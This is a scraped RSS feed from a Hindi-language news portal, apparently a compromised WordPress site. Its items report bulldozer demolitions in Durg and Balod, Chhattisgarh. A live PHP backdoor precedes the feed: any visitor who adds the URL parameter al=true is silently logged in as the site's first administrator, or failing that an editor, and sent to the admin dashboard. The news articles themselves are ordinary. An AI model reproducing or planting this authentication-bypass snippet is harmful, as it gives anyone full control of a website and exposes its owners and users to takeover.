// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Bulldozer ran – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sat, 06 Jul 2024 16:15:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 छत्तीसगढ़-दुर्ग में हिस्ट्रीशीटर के अतिक्रमण पर चला बुलडोजर, निगरानी बदमाशों पर पुलिस की कार्रवाई https://pratyushaashakinayikiran.com/?p=48693 Sat, 06 Jul 2024 16:15:00 +0000 https://pratyushaashakinayikiran.com/?p=48693 दुर्ग.

दुर्ग में जिला पुलिस ने निगरानी बदमाशों के खिलाफ कार्रवाई की है। बीएसपी की टीम ने हिस्ट्रीशीटर पिंकी राय के ढाबे और दुकान पर बुलडोजर चलाया। इस कार्रवाई में बड़ी संख्या में पुलिस के अधिकारी और जवान मौजूद रहे। बीएसपी के प्रवर्तन विभाग की टीम के साथ मिलकर पुलिस लगातार निगरानी बदमाशों के खिलाफ कार्रवाई कर रही है। इसी कड़ी में नेवई थाना के हिस्ट्रीशीटर पिंकी राय का ढाबा और दुकान पीआर बुलडोजर चलाकर ध्वस्त किया गया।

पिंकी राय दुर्ग जिले का एक हिस्ट्रीशीटर है जो बीएसपी के अवैध कब्जे पर कई सालों से कब्जा कर ढाबा संचालित कर रहा था। पिंकी राय को नोटिस देने के बाद पुलिस और बीएसपी की टीम ने उसके ढाबा और दुकान पर कार्रवाई की है। पिंकी राय के खिलाफ नेवई थाने में 14 से अधिक मामले दर्ज हैं। 23 मई 2024 को पिंकी राय और उसकी गैंग ने रिसाली नगर निगम के कर्मचारी विपिन का अपहरण किया था और अपने दुकान में लेकर जाकर विपिन के साथ मारपीट की थी। पिंकी राय, शैलेष निर्मलकर एवं ओम चौधरी ने कार में बिठाकर अपहरण किया जिसके बाद विपिन ने थाने में रिपोर्ट दर्ज कराई। पुलिस ने पिंकी राय के खिलाफ मामला दर्ज कर गिरफ्तारी हुई थी।

]]>
छत्तीसगढ़-बालोद में अवैध प्लॉटिंग पर चला बुलडोजर, प्रशासन ने कार्रवाई कर मामले की शुरू की जांच https://pratyushaashakinayikiran.com/?p=39883 Mon, 10 Jun 2024 18:26:00 +0000 https://pratyushaashakinayikiran.com/?p=39883 बालोद.

बालोद जिले में चल रहे अवैध प्लॉटिंग को लेकर प्रशासन ने बड़ी कार्रवाई की है। यहां पर गुरुर नगर में अवैध प्लॉटिंग क्षेत्र पर एसडीएम पूजा बंसल के निर्देश पर नगर पंचायत द्वारा बुलडोजर कार्रवाई की गई है। आपको बता दें कथित जमीन दलाल केशव देवांगन द्वारा अपने पत्नी रूपाली देवांगन के नाम पर जमीन खरीदकर अवैध प्लॉटिंग के कार्य को अंजाम दिया जा रहा था। साथ ही उसी जगह पर प्रतिबंधित वृक्षों की कटाई भी की गई थी।

पूरा मामला खसरा नंबर 91/5 का है। जहां 0.24 हेक्टेयर में प्रशासन ने कार्रवाई की है। आपको बता दें की कथित जमीन कारोबारी द्वारा अपने परिजनों के नाम पर जमीन खरीदकर ऐसे अवैध प्लॉटिंग के कामों को अंजाम दिया जाता था। जिस पर पहली दफा कार्रवाई हुई है। आपको बता दें इनके साथ शिक्षा के क्षेत्र से जुड़े एक व्यक्ति का नाम सामने आ रहा है। जिस पर विभागीय जांच बैठ सकती है। वहीं एग्रीमेंट के खेल में जमीन दलाल के ऊपर एक और शिकायती प्रकरण दर्ज किया जा सकता है। फिलहाल, प्रशासन अब केशव देवांगन और उनके सहयोगियों द्वारा किए जा रहे कार्यों के साथ-साथ पूर्व में किए गए अवैध प्लॉटिंग के मामले की जांच शुरू कर दी है। इससे पहले नोटिस जारी किया गया था।

]]>